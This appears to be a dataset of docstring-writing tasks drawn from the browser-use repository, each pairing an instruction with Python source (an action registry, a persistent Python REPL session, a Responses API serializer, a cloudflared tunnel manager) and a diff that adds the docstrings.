+ """Delegate get_index to the underlying action model"""
if hasattr(self.root, 'get_index'):
return self.root.get_index() # type: ignore
return None
def set_index(self, index: int):
+ """Delegate set_index to the underlying action model"""
if hasattr(self.root, 'set_index'):
self.root.set_index(index) # type: ignore
def model_dump(self, **kwargs):
+ """Delegate model_dump to the underlying action model"""
if hasattr(self.root, 'model_dump'):
return self.root.model_dump(**kwargs) # type: ignore
return super().model_dump(**kwargs)
@@ -553,4 +593,9 @@ return result_model # type:ignore
def get_prompt_description(self, page_url: str | None = None) -> str:
- return self.registry.get_prompt_description(page_url=page_url)+ """Get a description of all actions for the prompt
+
+ If page_url is provided, only include actions that are available for that URL
+ based on their domain filters
+ """
+ return self.registry.get_prompt_description(page_url=page_url)
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/tools/registry/service.py |
Generate missing documentation strings |
from datetime import datetime, timezone
from browser_use_sdk import BrowserUse
_client: BrowserUse | None = None
def get_sdk_client() -> BrowserUse:
global _client
if _client is None:
from browser_use.skill_cli.api_key import require_api_key
api_key = require_api_key('Cloud API')
_client = BrowserUse(api_key=api_key)
return _client
def format_duration(started_at: datetime | None, finished_at: datetime | None) -> str:
if not started_at:
return ''
try:
if finished_at:
end = finished_at
else:
end = datetime.now(timezone.utc)
delta = end - started_at
total_seconds = int(delta.total_seconds())
if total_seconds < 60:
return f'{total_seconds}s'
elif total_seconds < 3600:
minutes = total_seconds // 60
seconds = total_seconds % 60
return f'{minutes}m {seconds}s'
else:
hours = total_seconds // 3600
minutes = (total_seconds % 3600) // 60
return f'{hours}h {minutes}m'
except Exception:
return '' | --- +++ @@ -1,3 +1,4 @@+"""Shared utilities for CLI command handlers."""
from datetime import datetime, timezone
@@ -7,6 +8,7 @@
def get_sdk_client() -> BrowserUse:
+ """Get authenticated SDK client (singleton)."""
global _client
if _client is None:
from browser_use.skill_cli.api_key import require_api_key
@@ -17,6 +19,7 @@
def format_duration(started_at: datetime | None, finished_at: datetime | None) -> str:
+ """Format duration between two timestamps, or elapsed time if still running."""
if not started_at:
return ''
@@ -40,4 +43,4 @@ minutes = (total_seconds % 3600) // 60
return f'{hours}h {minutes}m'
except Exception:
- return ''+ return ''
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skill_cli/commands/utils.py |
Provide docstrings following PEP 257 |
import asyncio
import io
import traceback
from contextlib import redirect_stderr, redirect_stdout
from dataclasses import dataclass, field
from pathlib import Path
from typing import TYPE_CHECKING, Any, Literal
if TYPE_CHECKING:
from browser_use.browser.session import BrowserSession
@dataclass
class ExecutionResult:
success: bool
output: str = ''
error: str | None = None
@dataclass
class PythonSession:
namespace: dict[str, Any] = field(default_factory=dict)
execution_count: int = 0
history: list[tuple[str, ExecutionResult]] = field(default_factory=list)
def __post_init__(self) -> None:
self.namespace.update(
{
'__name__': '__main__',
'__doc__': None,
'json': __import__('json'),
're': __import__('re'),
'os': __import__('os'),
'Path': Path,
'asyncio': asyncio,
}
)
def execute(
self, code: str, browser_session: 'BrowserSession', loop: asyncio.AbstractEventLoop | None = None
) -> ExecutionResult:
# Inject browser wrapper with the event loop for async operations
if loop is not None:
self.namespace['browser'] = BrowserWrapper(browser_session, loop)
self.execution_count += 1
stdout = io.StringIO()
stderr = io.StringIO()
try:
with redirect_stdout(stdout), redirect_stderr(stderr):
try:
# First try to compile as expression (for REPL-like behavior)
compiled = compile(code, '<input>', 'eval')
result = eval(compiled, self.namespace)
if result is not None:
print(repr(result))
except SyntaxError:
# Compile as statements
compiled = compile(code, '<input>', 'exec')
exec(compiled, self.namespace)
output = stdout.getvalue()
if stderr.getvalue():
output += stderr.getvalue()
result = ExecutionResult(success=True, output=output)
except Exception as e:
output = stdout.getvalue()
error_msg = traceback.format_exc()
result = ExecutionResult(success=False, output=output, error=error_msg)
self.history.append((code, result))
return result
def reset(self) -> None:
self.namespace.clear()
self.history.clear()
self.execution_count = 0
self.__post_init__()
def get_variables(self) -> dict[str, str]:
skip = {'__name__', '__doc__', 'json', 're', 'os', 'Path', 'asyncio', 'browser'}
return {k: type(v).__name__ for k, v in self.namespace.items() if not k.startswith('_') and k not in skip}
class BrowserWrapper:
def __init__(self, session: 'BrowserSession', loop: asyncio.AbstractEventLoop) -> None:
self._session = session
self._loop = loop
def _run(self, coro: Any) -> Any:
future = asyncio.run_coroutine_threadsafe(coro, self._loop)
return future.result(timeout=60)
@property
def url(self) -> str:
return self._run(self._get_url())
async def _get_url(self) -> str:
state = await self._session.get_browser_state_summary(include_screenshot=False)
return state.url if state else ''
@property
def title(self) -> str:
return self._run(self._get_title())
async def _get_title(self) -> str:
state = await self._session.get_browser_state_summary(include_screenshot=False)
return state.title if state else ''
def goto(self, url: str) -> None:
self._run(self._goto_async(url))
async def _goto_async(self, url: str) -> None:
from browser_use.browser.events import NavigateToUrlEvent
await self._session.event_bus.dispatch(NavigateToUrlEvent(url=url))
def click(self, index: int) -> None:
self._run(self._click_async(index))
async def _click_async(self, index: int) -> None:
from browser_use.browser.events import ClickElementEvent
node = await self._session.get_element_by_index(index)
if node is None:
raise ValueError(f'Element index {index} not found')
await self._session.event_bus.dispatch(ClickElementEvent(node=node))
def type(self, text: str) -> None:
self._run(self._type_async(text))
async def _type_async(self, text: str) -> None:
cdp_session = await self._session.get_or_create_cdp_session(target_id=None, focus=False)
if not cdp_session:
raise RuntimeError('No active browser session')
await cdp_session.cdp_client.send.Input.insertText(
params={'text': text},
session_id=cdp_session.session_id,
)
def input(self, index: int, text: str) -> None:
self._run(self._input_async(index, text))
async def _input_async(self, index: int, text: str) -> None:
from browser_use.browser.events import ClickElementEvent, TypeTextEvent
node = await self._session.get_element_by_index(index)
if node is None:
raise ValueError(f'Element index {index} not found')
await self._session.event_bus.dispatch(ClickElementEvent(node=node))
await self._session.event_bus.dispatch(TypeTextEvent(node=node, text=text))
def scroll(self, direction: Literal['up', 'down', 'left', 'right'] = 'down', amount: int = 500) -> None:
self._run(self._scroll_async(direction, amount))
async def _scroll_async(self, direction: Literal['up', 'down', 'left', 'right'], amount: int) -> None:
from browser_use.browser.events import ScrollEvent
await self._session.event_bus.dispatch(ScrollEvent(direction=direction, amount=amount))
def screenshot(self, path: str | None = None) -> bytes:
data = self._run(self._session.take_screenshot())
if path:
Path(path).write_bytes(data)
return data
@property
def html(self) -> str:
return self._run(self._get_html())
async def _get_html(self) -> str:
cdp_session = await self._session.get_or_create_cdp_session(target_id=None, focus=False)
if not cdp_session:
return ''
# Get the document root
doc = await cdp_session.cdp_client.send.DOM.getDocument(
params={},
session_id=cdp_session.session_id,
)
if not doc or 'root' not in doc:
return ''
# Get outer HTML of the root node
result = await cdp_session.cdp_client.send.DOM.getOuterHTML(
params={'nodeId': doc['root']['nodeId']},
session_id=cdp_session.session_id,
)
return result.get('outerHTML', '') if result else ''
def keys(self, keys: str) -> None:
self._run(self._keys_async(keys))
async def _keys_async(self, keys: str) -> None:
from browser_use.browser.events import SendKeysEvent
await self._session.event_bus.dispatch(SendKeysEvent(keys=keys))
def back(self) -> None:
self._run(self._back_async())
async def _back_async(self) -> None:
from browser_use.browser.events import GoBackEvent
await self._session.event_bus.dispatch(GoBackEvent())
def wait(self, seconds: float) -> None:
import time
time.sleep(seconds)
def extract(self, query: str) -> Any:
# This would need LLM integration
raise NotImplementedError('extract() requires LLM integration - use agent.run() instead') | --- +++ @@ -1,3 +1,4 @@+"""Jupyter-like persistent Python execution for browser-use CLI."""
import asyncio
import io
@@ -13,6 +14,7 @@
@dataclass
class ExecutionResult:
+ """Result of Python code execution."""
success: bool
output: str = ''
@@ -21,12 +23,18 @@
@dataclass
class PythonSession:
+ """Jupyter-like persistent Python execution.
+
+ Maintains a namespace across multiple code executions, allowing variables
+ to persist between commands. Provides a `browser` object for browser control.
+ """
namespace: dict[str, Any] = field(default_factory=dict)
execution_count: int = 0
history: list[tuple[str, ExecutionResult]] = field(default_factory=list)
def __post_init__(self) -> None:
+ """Initialize namespace with useful imports."""
self.namespace.update(
{
'__name__': '__main__',
@@ -42,6 +50,16 @@ def execute(
self, code: str, browser_session: 'BrowserSession', loop: asyncio.AbstractEventLoop | None = None
) -> ExecutionResult:
+ """Execute code in persistent namespace.
+
+ The `browser` variable is injected into the namespace before each execution,
+ providing a convenient wrapper around the BrowserSession.
+
+ Args:
+ code: Python code to execute
+ browser_session: The browser session for browser operations
+ loop: The event loop for async operations (required for browser access)
+ """
# Inject browser wrapper with the event loop for async operations
if loop is not None:
self.namespace['browser'] = BrowserWrapper(browser_session, loop)
@@ -78,28 +96,37 @@ return result
def reset(self) -> None:
+ """Clear namespace and history."""
self.namespace.clear()
self.history.clear()
self.execution_count = 0
self.__post_init__()
def get_variables(self) -> dict[str, str]:
+ """Get user-defined variables and their types."""
skip = {'__name__', '__doc__', 'json', 're', 'os', 'Path', 'asyncio', 'browser'}
return {k: type(v).__name__ for k, v in self.namespace.items() if not k.startswith('_') and k not in skip}
class BrowserWrapper:
+ """Convenient browser access for Python code.
+
+ Provides synchronous methods that wrap async BrowserSession operations.
+ Runs coroutines on the server's event loop using run_coroutine_threadsafe.
+ """
def __init__(self, session: 'BrowserSession', loop: asyncio.AbstractEventLoop) -> None:
self._session = session
self._loop = loop
def _run(self, coro: Any) -> Any:
+ """Run coroutine on the server's event loop."""
future = asyncio.run_coroutine_threadsafe(coro, self._loop)
return future.result(timeout=60)
@property
def url(self) -> str:
+ """Get current page URL."""
return self._run(self._get_url())
async def _get_url(self) -> str:
@@ -108,6 +135,7 @@
@property
def title(self) -> str:
+ """Get current page title."""
return self._run(self._get_title())
async def _get_title(self) -> str:
@@ -115,6 +143,7 @@ return state.title if state else ''
def goto(self, url: str) -> None:
+ """Navigate to URL."""
self._run(self._goto_async(url))
async def _goto_async(self, url: str) -> None:
@@ -123,6 +152,7 @@ await self._session.event_bus.dispatch(NavigateToUrlEvent(url=url))
def click(self, index: int) -> None:
+ """Click element by index."""
self._run(self._click_async(index))
async def _click_async(self, index: int) -> None:
@@ -134,6 +164,7 @@ await self._session.event_bus.dispatch(ClickElementEvent(node=node))
def type(self, text: str) -> None:
+ """Type text into focused element."""
self._run(self._type_async(text))
async def _type_async(self, text: str) -> None:
@@ -146,6 +177,7 @@ )
def input(self, index: int, text: str) -> None:
+ """Click element and type text."""
self._run(self._input_async(index, text))
async def _input_async(self, index: int, text: str) -> None:
@@ -158,6 +190,7 @@ await self._session.event_bus.dispatch(TypeTextEvent(node=node, text=text))
def scroll(self, direction: Literal['up', 'down', 'left', 'right'] = 'down', amount: int = 500) -> None:
+ """Scroll the page."""
self._run(self._scroll_async(direction, amount))
async def _scroll_async(self, direction: Literal['up', 'down', 'left', 'right'], amount: int) -> None:
@@ -166,6 +199,7 @@ await self._session.event_bus.dispatch(ScrollEvent(direction=direction, amount=amount))
def screenshot(self, path: str | None = None) -> bytes:
+ """Take screenshot, optionally save to file."""
data = self._run(self._session.take_screenshot())
if path:
Path(path).write_bytes(data)
@@ -173,6 +207,7 @@
@property
def html(self) -> str:
+ """Get page HTML."""
return self._run(self._get_html())
async def _get_html(self) -> str:
@@ -194,6 +229,7 @@ return result.get('outerHTML', '') if result else ''
def keys(self, keys: str) -> None:
+ """Send keyboard keys."""
self._run(self._keys_async(keys))
async def _keys_async(self, keys: str) -> None:
@@ -202,6 +238,7 @@ await self._session.event_bus.dispatch(SendKeysEvent(keys=keys))
def back(self) -> None:
+ """Go back in history."""
self._run(self._back_async())
async def _back_async(self) -> None:
@@ -210,10 +247,12 @@ await self._session.event_bus.dispatch(GoBackEvent())
def wait(self, seconds: float) -> None:
+ """Wait for specified seconds."""
import time
time.sleep(seconds)
def extract(self, query: str) -> Any:
+ """Extract data using LLM (requires API key)."""
# This would need LLM integration
- raise NotImplementedError('extract() requires LLM integration - use agent.run() instead')+ raise NotImplementedError('extract() requires LLM integration - use agent.run() instead')
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skill_cli/python_session.py |
Include argument descriptions in docstrings |
from typing import overload
from openai.types.responses.easy_input_message_param import EasyInputMessageParam
from openai.types.responses.response_input_image_param import ResponseInputImageParam
from openai.types.responses.response_input_message_content_list_param import (
ResponseInputMessageContentListParam,
)
from openai.types.responses.response_input_text_param import ResponseInputTextParam
from browser_use.llm.messages import (
AssistantMessage,
BaseMessage,
ContentPartImageParam,
ContentPartRefusalParam,
ContentPartTextParam,
SystemMessage,
UserMessage,
)
class ResponsesAPIMessageSerializer:
@staticmethod
def _serialize_content_part_text(part: ContentPartTextParam) -> ResponseInputTextParam:
return ResponseInputTextParam(text=part.text, type='input_text')
@staticmethod
def _serialize_content_part_image(part: ContentPartImageParam) -> ResponseInputImageParam:
return ResponseInputImageParam(
image_url=part.image_url.url,
detail=part.image_url.detail,
type='input_image',
)
@staticmethod
def _serialize_user_content(
content: str | list[ContentPartTextParam | ContentPartImageParam],
) -> str | ResponseInputMessageContentListParam:
if isinstance(content, str):
return content
serialized_parts: ResponseInputMessageContentListParam = []
for part in content:
if part.type == 'text':
serialized_parts.append(ResponsesAPIMessageSerializer._serialize_content_part_text(part))
elif part.type == 'image_url':
serialized_parts.append(ResponsesAPIMessageSerializer._serialize_content_part_image(part))
return serialized_parts
@staticmethod
def _serialize_system_content(
content: str | list[ContentPartTextParam],
) -> str | ResponseInputMessageContentListParam:
if isinstance(content, str):
return content
serialized_parts: ResponseInputMessageContentListParam = []
for part in content:
if part.type == 'text':
serialized_parts.append(ResponsesAPIMessageSerializer._serialize_content_part_text(part))
return serialized_parts
@staticmethod
def _serialize_assistant_content(
content: str | list[ContentPartTextParam | ContentPartRefusalParam] | None,
) -> str | ResponseInputMessageContentListParam | None:
if content is None:
return None
if isinstance(content, str):
return content
serialized_parts: ResponseInputMessageContentListParam = []
for part in content:
if part.type == 'text':
serialized_parts.append(ResponsesAPIMessageSerializer._serialize_content_part_text(part))
# Refusals are converted to text for the Responses API
elif part.type == 'refusal':
serialized_parts.append(ResponseInputTextParam(text=f'[Refusal: {part.refusal}]', type='input_text'))
return serialized_parts
@overload
@staticmethod
def serialize(message: UserMessage) -> EasyInputMessageParam: ...
@overload
@staticmethod
def serialize(message: SystemMessage) -> EasyInputMessageParam: ...
@overload
@staticmethod
def serialize(message: AssistantMessage) -> EasyInputMessageParam: ...
@staticmethod
def serialize(message: BaseMessage) -> EasyInputMessageParam:
if isinstance(message, UserMessage):
return EasyInputMessageParam(
role='user',
content=ResponsesAPIMessageSerializer._serialize_user_content(message.content),
)
elif isinstance(message, SystemMessage):
# Note: Responses API uses 'developer' role for system messages in some contexts,
# but 'system' is also supported via EasyInputMessageParam
return EasyInputMessageParam(
role='system',
content=ResponsesAPIMessageSerializer._serialize_system_content(message.content),
)
elif isinstance(message, AssistantMessage):
content = ResponsesAPIMessageSerializer._serialize_assistant_content(message.content)
# For assistant messages, we need to provide content
# If content is None but there are tool calls, we represent them as text
if content is None:
if message.tool_calls:
# Convert tool calls to a text representation for context
tool_call_text = '\n'.join(
f'[Tool call: {tc.function.name}({tc.function.arguments})]' for tc in message.tool_calls
)
content = tool_call_text
else:
content = ''
return EasyInputMessageParam(
role='assistant',
content=content,
)
else:
raise ValueError(f'Unknown message type: {type(message)}')
@staticmethod
def serialize_messages(messages: list[BaseMessage]) -> list[EasyInputMessageParam]:
return [ResponsesAPIMessageSerializer.serialize(m) for m in messages] | --- +++ @@ -1,3 +1,4 @@+"""Serializer for converting messages to OpenAI Responses API input format."""
from typing import overload
@@ -20,6 +21,7 @@
class ResponsesAPIMessageSerializer:
+ """Serializer for converting between custom message types and OpenAI Responses API input format."""
@staticmethod
def _serialize_content_part_text(part: ContentPartTextParam) -> ResponseInputTextParam:
@@ -37,6 +39,7 @@ def _serialize_user_content(
content: str | list[ContentPartTextParam | ContentPartImageParam],
) -> str | ResponseInputMessageContentListParam:
+ """Serialize content for user messages (text and images allowed)."""
if isinstance(content, str):
return content
@@ -52,6 +55,7 @@ def _serialize_system_content(
content: str | list[ContentPartTextParam],
) -> str | ResponseInputMessageContentListParam:
+ """Serialize content for system messages (text only)."""
if isinstance(content, str):
return content
@@ -65,6 +69,7 @@ def _serialize_assistant_content(
content: str | list[ContentPartTextParam | ContentPartRefusalParam] | None,
) -> str | ResponseInputMessageContentListParam | None:
+ """Serialize content for assistant messages (text only for Responses API)."""
if content is None:
return None
if isinstance(content, str):
@@ -93,6 +98,7 @@
@staticmethod
def serialize(message: BaseMessage) -> EasyInputMessageParam:
+ """Serialize a custom message to an OpenAI Responses API input message param."""
if isinstance(message, UserMessage):
return EasyInputMessageParam(
@@ -132,4 +138,5 @@
@staticmethod
def serialize_messages(messages: list[BaseMessage]) -> list[EasyInputMessageParam]:
- return [ResponsesAPIMessageSerializer.serialize(m) for m in messages]+ """Serialize a list of messages to Responses API input format."""
+ return [ResponsesAPIMessageSerializer.serialize(m) for m in messages]
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/llm/openai/responses_serializer.py |
Generate docstrings for each module |
import asyncio
import json
import logging
import os
import re
import shutil
import signal
from pathlib import Path
from typing import Any
logger = logging.getLogger(__name__)
# Pattern to extract tunnel URL from cloudflared output
_URL_PATTERN = re.compile(r'(https://\S+\.trycloudflare\.com)')
# Directory for tunnel PID files
_TUNNELS_DIR = Path.home() / '.browser-use' / 'tunnels'
class TunnelManager:
def __init__(self) -> None:
self._binary_path: str | None = None
def get_binary_path(self) -> str:
# Cached result from previous call
if self._binary_path:
return self._binary_path
# Check system installation
system_binary = shutil.which('cloudflared')
if system_binary:
logger.info('Using cloudflared: %s', system_binary)
self._binary_path = system_binary
return system_binary
# Not found
raise RuntimeError(
'cloudflared not installed.\n\n'
'Install cloudflared:\n'
' macOS: brew install cloudflared\n'
' Linux: curl -L https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64 -o ~/.local/bin/cloudflared && chmod +x ~/.local/bin/cloudflared\n'
' Windows: winget install Cloudflare.cloudflared\n\n'
'Or re-run install.sh which installs cloudflared automatically.\n\n'
'Then retry: browser-use tunnel <port>'
)
def is_available(self) -> bool:
if self._binary_path:
return True
return shutil.which('cloudflared') is not None
def get_status(self) -> dict[str, Any]:
system_binary = shutil.which('cloudflared')
if system_binary:
return {
'available': True,
'source': 'system',
'path': system_binary,
'note': 'cloudflared installed',
}
return {
'available': False,
'source': None,
'path': None,
'note': 'cloudflared not installed - run install.sh or install manually',
}
# Global singleton instance
_tunnel_manager: TunnelManager | None = None
def get_tunnel_manager() -> TunnelManager:
global _tunnel_manager
if _tunnel_manager is None:
_tunnel_manager = TunnelManager()
return _tunnel_manager
# =============================================================================
# PID File Management
# =============================================================================
def _get_tunnel_file(port: int) -> Path:
return _TUNNELS_DIR / f'{port}.json'
def _save_tunnel_info(port: int, pid: int, url: str) -> None:
_TUNNELS_DIR.mkdir(parents=True, exist_ok=True)
_get_tunnel_file(port).write_text(json.dumps({'port': port, 'pid': pid, 'url': url}))
def _load_tunnel_info(port: int) -> dict[str, Any] | None:
tunnel_file = _get_tunnel_file(port)
if not tunnel_file.exists():
return None
try:
info = json.loads(tunnel_file.read_text())
pid = info.get('pid')
if pid and _is_process_alive(pid):
return info
# Process dead, clean up stale file
tunnel_file.unlink(missing_ok=True)
return None
except (json.JSONDecodeError, OSError):
tunnel_file.unlink(missing_ok=True)
return None
def _delete_tunnel_info(port: int) -> None:
_get_tunnel_file(port).unlink(missing_ok=True)
def _is_process_alive(pid: int) -> bool:
try:
os.kill(pid, 0)
return True
except (OSError, ProcessLookupError):
return False
def _kill_process(pid: int) -> bool:
try:
os.kill(pid, signal.SIGTERM)
# Give it a moment to terminate gracefully
for _ in range(10):
if not _is_process_alive(pid):
return True
import time
time.sleep(0.1)
# Force kill if still alive
os.kill(pid, signal.SIGKILL)
return True
except (OSError, ProcessLookupError):
return False
# =============================================================================
# Standalone Tunnel Functions (no browser session required)
# =============================================================================
async def start_tunnel(port: int) -> dict[str, Any]:
# Check if tunnel already exists for this port
existing = _load_tunnel_info(port)
if existing:
return {'url': existing['url'], 'port': port, 'existing': True}
# Get cloudflared binary
try:
tunnel_manager = get_tunnel_manager()
cloudflared_binary = tunnel_manager.get_binary_path()
except RuntimeError as e:
return {'error': str(e)}
# Create log file for cloudflared stderr (avoids SIGPIPE when parent exits)
_TUNNELS_DIR.mkdir(parents=True, exist_ok=True)
log_file_path = _TUNNELS_DIR / f'{port}.log'
log_file = open(log_file_path, 'w') # noqa: ASYNC230
# Spawn cloudflared as a daemon
# - start_new_session=True: survives parent exit
# - stderr to file: avoids SIGPIPE when parent's pipe closes
process = await asyncio.create_subprocess_exec(
cloudflared_binary,
'tunnel',
'--url',
f'http://localhost:{port}',
stdout=asyncio.subprocess.DEVNULL,
stderr=log_file,
start_new_session=True,
)
# Poll the log file until we find the tunnel URL
url: str | None = None
try:
import time
deadline = time.time() + 15
while time.time() < deadline:
# Check if process died
if process.returncode is not None:
log_file.close()
content = log_file_path.read_text() if log_file_path.exists() else ''
return {'error': f'cloudflared exited unexpectedly: {content[:500]}'}
# Read log file content
try:
content = log_file_path.read_text()
match = _URL_PATTERN.search(content)
if match:
url = match.group(1)
break
except OSError:
pass
await asyncio.sleep(0.2)
except Exception as e:
process.terminate()
log_file.close()
return {'error': f'Failed to start tunnel: {e}'}
if url is None:
process.terminate()
log_file.close()
return {'error': 'Timed out waiting for cloudflare tunnel URL (15s)'}
# Close log file handle to avoid leaking file descriptors
log_file.close()
# Save tunnel info to disk so it persists across CLI invocations
_save_tunnel_info(port, process.pid, url)
logger.info(f'Tunnel started: localhost:{port} -> {url} (pid={process.pid})')
return {'url': url, 'port': port}
def list_tunnels() -> dict[str, Any]:
tunnels = []
if _TUNNELS_DIR.exists():
for tunnel_file in _TUNNELS_DIR.glob('*.json'):
try:
port = int(tunnel_file.stem)
info = _load_tunnel_info(port)
if info:
tunnels.append({'port': info['port'], 'url': info['url']})
except (ValueError, json.JSONDecodeError):
continue
return {'tunnels': tunnels, 'count': len(tunnels)}
async def stop_tunnel(port: int) -> dict[str, Any]:
info = _load_tunnel_info(port)
if not info:
return {'error': f'No tunnel running on port {port}'}
url = info['url']
pid = info['pid']
_kill_process(pid)
_delete_tunnel_info(port)
# Clean up log file
log_file = _TUNNELS_DIR / f'{port}.log'
log_file.unlink(missing_ok=True)
logger.info(f'Tunnel stopped: localhost:{port}')
return {'stopped': port, 'url': url}
async def stop_all_tunnels() -> dict[str, Any]:
stopped = []
if _TUNNELS_DIR.exists():
for tunnel_file in _TUNNELS_DIR.glob('*.json'):
try:
port = int(tunnel_file.stem)
result = await stop_tunnel(port)
if 'stopped' in result:
stopped.append(port)
except ValueError:
continue
return {'stopped': stopped, 'count': len(stopped)} | --- +++ @@ -1,3 +1,15 @@+"""Cloudflared tunnel binary management.
+
+This module manages the cloudflared binary for tunnel support.
+Cloudflared must be installed via install.sh or manually by the user.
+
+Tunnels are managed independently of browser sessions - they are purely
+a network utility for exposing local ports via Cloudflare quick tunnels.
+
+Tunnels survive CLI process exit by:
+1. Spawning cloudflared as a daemon (start_new_session=True)
+2. Tracking tunnel info via PID files in ~/.browser-use/tunnels/
+"""
import asyncio
import json
@@ -19,11 +31,20 @@
class TunnelManager:
+ """Manages cloudflared binary location."""
def __init__(self) -> None:
self._binary_path: str | None = None
def get_binary_path(self) -> str:
+ """Get cloudflared binary path.
+
+ Returns:
+ Absolute path to cloudflared binary
+
+ Raises:
+ RuntimeError: If cloudflared is not installed
+ """
# Cached result from previous call
if self._binary_path:
return self._binary_path
@@ -47,11 +68,13 @@ )
def is_available(self) -> bool:
+ """Check if cloudflared is available."""
if self._binary_path:
return True
return shutil.which('cloudflared') is not None
def get_status(self) -> dict[str, Any]:
+ """Get tunnel capability status for doctor command."""
system_binary = shutil.which('cloudflared')
if system_binary:
return {
@@ -74,6 +97,7 @@
def get_tunnel_manager() -> TunnelManager:
+ """Get the global TunnelManager instance (singleton pattern)."""
global _tunnel_manager
if _tunnel_manager is None:
_tunnel_manager = TunnelManager()
@@ -86,15 +110,18 @@
def _get_tunnel_file(port: int) -> Path:
+ """Get the path to a tunnel's info file."""
return _TUNNELS_DIR / f'{port}.json'
def _save_tunnel_info(port: int, pid: int, url: str) -> None:
+ """Save tunnel info to disk."""
_TUNNELS_DIR.mkdir(parents=True, exist_ok=True)
_get_tunnel_file(port).write_text(json.dumps({'port': port, 'pid': pid, 'url': url}))
def _load_tunnel_info(port: int) -> dict[str, Any] | None:
+ """Load tunnel info from disk, returning None if not found or process dead."""
tunnel_file = _get_tunnel_file(port)
if not tunnel_file.exists():
return None
@@ -113,10 +140,12 @@
def _delete_tunnel_info(port: int) -> None:
+ """Delete tunnel info file."""
_get_tunnel_file(port).unlink(missing_ok=True)
def _is_process_alive(pid: int) -> bool:
+ """Check if a process is still running."""
try:
os.kill(pid, 0)
return True
@@ -125,6 +154,7 @@
def _kill_process(pid: int) -> bool:
+ """Kill a process by PID. Returns True if killed, False if already dead."""
try:
os.kill(pid, signal.SIGTERM)
# Give it a moment to terminate gracefully
@@ -147,6 +177,16 @@
async def start_tunnel(port: int) -> dict[str, Any]:
+ """Start a cloudflare quick tunnel for a local port.
+
+ The tunnel runs as a daemon process that survives CLI exit.
+
+ Args:
+ port: Local port to tunnel
+
+ Returns:
+ Dict with 'url' and 'port' on success, or 'error' on failure
+ """
# Check if tunnel already exists for this port
existing = _load_tunnel_info(port)
if existing:
@@ -222,6 +262,11 @@
def list_tunnels() -> dict[str, Any]:
+ """List active tunnels.
+
+ Returns:
+ Dict with 'tunnels' list and 'count'
+ """
tunnels = []
if _TUNNELS_DIR.exists():
for tunnel_file in _TUNNELS_DIR.glob('*.json'):
@@ -236,6 +281,14 @@
async def stop_tunnel(port: int) -> dict[str, Any]:
+ """Stop a tunnel for a specific port.
+
+ Args:
+ port: Port number to stop tunnel for
+
+ Returns:
+ Dict with 'stopped' port and 'url' on success, or 'error'
+ """
info = _load_tunnel_info(port)
if not info:
return {'error': f'No tunnel running on port {port}'}
@@ -253,6 +306,11 @@
async def stop_all_tunnels() -> dict[str, Any]:
+ """Stop all active tunnels.
+
+ Returns:
+ Dict with 'stopped' list of ports
+ """
stopped = []
if _TUNNELS_DIR.exists():
for tunnel_file in _TUNNELS_DIR.glob('*.json'):
@@ -264,4 +322,4 @@ except ValueError:
continue
- return {'stopped': stopped, 'count': len(stopped)}+ return {'stopped': stopped, 'count': len(stopped)}
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skill_cli/tunnel.py |
Add docstrings for internal functions |
__all__ = ['main']
def __getattr__(name: str):
if name == 'main':
from browser_use.skill_cli.main import main
return main
raise AttributeError(f'module {__name__!r} has no attribute {name!r}') | --- +++ @@ -1,10 +1,24 @@+"""Browser-use CLI package.
+
+This package provides a fast command-line interface for browser automation.
+The CLI uses a session server architecture for persistent browser sessions.
+
+Usage:
+ browser-use open https://example.com
+ browser-use click 5
+ browser-use type "Hello World"
+ browser-use python "print(browser.url)"
+ browser-use run "Fill the contact form"
+ browser-use close
+"""
__all__ = ['main']
def __getattr__(name: str):
+ """Lazy import to avoid runpy warnings when running as module."""
if name == 'main':
from browser_use.skill_cli.main import main
return main
- raise AttributeError(f'module {__name__!r} has no attribute {name!r}')+ raise AttributeError(f'module {__name__!r} has no attribute {name!r}')
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skill_cli/__init__.py |
Write reusable docstrings | from collections.abc import Callable
from typing import TYPE_CHECKING, Any
from pydantic import BaseModel, ConfigDict
from browser_use.browser import BrowserSession
from browser_use.filesystem.file_system import FileSystem
from browser_use.llm.base import BaseChatModel
if TYPE_CHECKING:
pass
class RegisteredAction(BaseModel):
name: str
description: str
function: Callable
param_model: type[BaseModel]
# If True, this action is known to change the page (e.g. navigate, search, go_back, switch).
# multi_act() will abort remaining queued actions after executing a terminates_sequence action.
terminates_sequence: bool = False
# filters: provide specific domains to determine whether the action should be available on the given URL or not
domains: list[str] | None = None # e.g. ['*.google.com', 'www.bing.com', 'yahoo.*]
model_config = ConfigDict(arbitrary_types_allowed=True)
def prompt_description(self) -> str:
schema = self.param_model.model_json_schema()
params = []
if 'properties' in schema:
for param_name, param_info in schema['properties'].items():
# Build parameter description
param_desc = param_name
# Add type information if available
if 'type' in param_info:
param_type = param_info['type']
param_desc += f'={param_type}'
# Add description as comment if available
if 'description' in param_info:
param_desc += f' ({param_info["description"]})'
params.append(param_desc)
# Format: action_name: Description. (param1=type, param2=type, ...)
if params:
return f'{self.name}: {self.description}. ({", ".join(params)})'
else:
return f'{self.name}: {self.description}'
class ActionModel(BaseModel):
# this will have all the registered actions, e.g.
# click_element = param_model = ClickElementParams
# done = param_model = None
#
model_config = ConfigDict(arbitrary_types_allowed=True, extra='forbid')
def get_index(self) -> int | None:
# {'clicked_element': {'index':5}}
params = self.model_dump(exclude_unset=True).values()
if not params:
return None
for param in params:
if param is not None and 'index' in param:
return param['index']
return None
def set_index(self, index: int):
# Get the action name and params
action_data = self.model_dump(exclude_unset=True)
action_name = next(iter(action_data.keys()))
action_params = getattr(self, action_name)
# Update the index directly on the model
if hasattr(action_params, 'index'):
action_params.index = index
class ActionRegistry(BaseModel):
actions: dict[str, RegisteredAction] = {}
@staticmethod
def _match_domains(domains: list[str] | None, url: str) -> bool:
if domains is None or not url:
return True
# Use the centralized URL matching logic from utils
from browser_use.utils import match_url_with_domain_pattern
for domain_pattern in domains:
if match_url_with_domain_pattern(url, domain_pattern):
return True
return False
def get_prompt_description(self, page_url: str | None = None) -> str:
if page_url is None:
# For system prompt (no URL provided), include only actions with no filters
return '\n'.join(action.prompt_description() for action in self.actions.values() if action.domains is None)
# only include filtered actions for the current page URL
filtered_actions = []
for action in self.actions.values():
if not action.domains:
